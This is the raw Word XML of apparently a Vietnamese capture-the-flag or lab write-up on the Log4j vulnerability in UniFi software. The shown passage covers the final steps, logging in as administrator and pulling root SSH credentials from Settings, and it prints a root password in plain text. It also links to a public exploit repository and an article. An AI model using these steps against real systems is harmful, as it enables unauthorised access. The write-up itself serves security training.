            <wp:extent cx="5943600" cy="1651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9F0C" w14:textId="2F53F32B" w:rsidR="00E373AC" w:rsidRDefault="00E373AC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42A4935C" w14:textId="6D4E1B30" w:rsidR="006E564B" w:rsidRDefault="006E56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Bây giờ quay lại trang web và đăng nhập administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6875FA58" w14:textId="1111F031" w:rsidR="006E564B" w:rsidRDefault="006E564B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="783842B1" w14:textId="06299E78" w:rsidR="006E564B" w:rsidRDefault="00A018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Vào trang Settings</w:t>
      </w:r>
      <w:r w:rsidRPr="00A018E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Site, lấy thông tin đăng nhập SSH của root:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B12735" w14:textId="7839C5E9" w:rsidR="00A018EF" w:rsidRDefault="00A018EF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B6A7B8C" w14:textId="194B0D41" w:rsidR="00A018EF" w:rsidRDefault="00805D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23A59AB" wp14:editId="4AC2412C">
            <wp:extent cx="5282005" cy="301180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15058" r="4587" b="3839"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5283708" cy="301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8290A" w14:textId="3E5B47D7" w:rsidR="00805D69" w:rsidRDefault="00805D69">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EDFC976" w14:textId="3BEA5D2D" w:rsidR="00805D69" w:rsidRDefault="00805D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root:</w:t>
      </w:r>
      <w:r w:rsidRPr="00805D69">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00805D69">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NotACrackablePassword4U2022</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29055C78" w14:textId="4DB92842" w:rsidR="00805D69" w:rsidRDefault="00805D69">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="534A3C73" w14:textId="2C1DB74F" w:rsidR="00805D69" w:rsidRDefault="00805D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836830" wp14:editId="556C058C">
            <wp:extent cx="3378200" cy="44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1750" w14:textId="03073ABD" w:rsidR="00805D69" w:rsidRDefault="00805D69">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47650B19" w14:textId="073B15D5" w:rsidR="00805D69" w:rsidRDefault="00805D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Tham khảo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C14375" w14:textId="398584D3" w:rsidR="00805D69" w:rsidRDefault="00805D69">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00805D69">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://github.com/puzzlepeaches/Log4jUnifi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52455E1B" w14:textId="02DD95DE" w:rsidR="00805D69" w:rsidRDefault="00B137DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B137DB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://www.sprocketsecurity.com/resources/another-log4j-on-the-fire-unifi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F8B790" w14:textId="77777777" w:rsidR="00E373AC" w:rsidRPr="00D17BEA" w:rsidRDefault="00E373AC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00E373AC" w:rsidRPr="00D17B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9B"/>
    <w:rsid w:val="000522AE"/>
    <w:rsid w:val="00065AC8"/>
    <w:rsid w:val="00175222"/>
    <w:rsid w:val="00176C9B"/>
    <w:rsid w:val="0018700F"/>
    <w:rsid w:val="001D3FC2"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="004C5BFB"/>
    <w:rsid w:val="00506A38"/>
    <w:rsid w:val="00593684"/>
    <w:rsid w:val="00636D34"/>
    <w:rsid w:val="00637730"/>
    <w:rsid w:val="006E564B"/>
    <w:rsid w:val="00805D69"/>
    <w:rsid w:val="009220E2"/>
    <w:rsid w:val="00993B49"/>
    <w:rsid w:val="00A018EF"/>
    <w:rsid w:val="00A26F2B"/>
    <w:rsid w:val="00B04363"/>
    <w:rsid w:val="00B137DB"/>
    <w:rsid w:val="00B71FDF"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00BE4CF0"/>
    <w:rsid w:val="00CE33A0"/>
    <w:rsid w:val="00D1262B"/>
    <w:rsid w:val="00D17BEA"/>
    <w:rsid w:val="00DC2F18"/>
    <w:rsid w:val="00E071FD"/>
    <w:rsid w:val="00E373AC"/>
    <w:rsid w:val="00E84818"/>
    <w:rsid w:val="00F64130"/>
    <w:rsid w:val="00FF5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D70227"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D608032B-A75E-C34B-84FC-B74FC2CDE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2024-06-23T13:30:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-23T15:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>